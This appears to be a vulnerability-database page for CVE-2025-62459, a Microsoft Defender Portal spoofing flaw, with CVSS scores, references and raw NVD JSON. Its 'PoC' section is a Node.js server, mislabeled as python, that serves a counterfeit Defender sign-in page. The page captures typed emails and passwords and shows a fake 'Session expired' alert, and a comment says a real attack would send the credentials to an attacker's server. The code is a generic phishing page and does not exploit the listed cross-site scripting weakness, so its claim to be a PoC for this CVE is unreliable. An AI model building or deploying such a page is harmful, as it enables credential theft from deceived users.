CVE-2025-62459

Description

Microsoft Defender Portal Spoofing Vulnerability

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:microsoft:365_defender_portal:-:*:*:*:*:*:*:* - VULNERABLE

Microsoft Defender Portal 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-62459 PoC - Microsoft Defender Portal Spoofing
// This PoC demonstrates the concept of portal spoofing attack

const http = require('http');
const path = require('path');

// Malicious server that mimics Microsoft Defender Portal
const server = http.createServer((req, res) => {
    const html = `
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Microsoft Defender Portal - Sign In</title>
        <style>
            body {
                font-family: 'Segoe UI', sans-serif;
                background: #f3f3f3;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                margin: 0;
            }
            .login-container {
                background: white;
                padding: 40px;
                border-radius: 8px;
                box-shadow: 0 2px 10px rgba(0,0,0,0.1);
                width: 400px;
            }
            .logo {
                text-align: center;
                margin-bottom: 30px;
            }
            input {
                width: 100%;
                padding: 12px;
                margin: 10px 0;
                border: 1px solid #ddd;
                border-radius: 4px;
                box-sizing: border-box;
            }
            button {
                width: 100%;
                padding: 12px;
                background: #0078d4;
                color: white;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                margin-top: 10px;
            }
            button:hover {
                background: #006cbd;
            }
            .warning {
                color: #d83b01;
                font-size: 12px;
                text-align: center;
                margin-top: 20px;
            }
        </style>
    </head>
    <body>
        <div class="login-container">
            <div class="logo">
                <h2>Microsoft Defender</h2>
                <p>Portal</p>
            </div>
            <form id="loginForm" onsubmit="captureCredentials(event)">
                <input type="email" id="email" placeholder="Email or phone" required>
                <input type="password" id="password" placeholder="Password" required>
                <button type="submit">Sign in</button>
            </form>
            <p class="warning">CVE-2025-62459 Demo - For security research only</p>
        </div>
        <script>
            function captureCredentials(event) {
                event.preventDefault();
                const email = document.getElementById('email').value;
                const password = document.getElementById('password').value;
                // In real attack, send to attacker-controlled server
                console.log('Captured:', { email, password });
                alert('Session expired. Please try again.');
            }
        </script>
    </body>
    </html>
    `;
    res.writeHead(200, { 'Content-Type': 'text/html' });
    res.end(html);
});

const PORT = 8443;
server.listen(PORT, () => {
    console.log(`Malicious server running on port ${PORT}`);
    console.log('This demonstrates CVE-2025-62459 spoofing attack');
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62459
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62459
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62459/
[4] VulDB https://vuldb.com/cve/CVE-2025-62459
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62459

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62459", "sourceIdentifier": "[email protected]", "published": "2025-11-20T23:15:56.563", "lastModified": "2025-12-10T20:56:50.857", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Microsoft Defender Portal Spoofing Vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_defender_portal:-:*:*:*:*:*:*:*", "matchCriteriaId": "A0BC0993-869F-41FB-9CAE-F4B2E2781B09"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62459", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}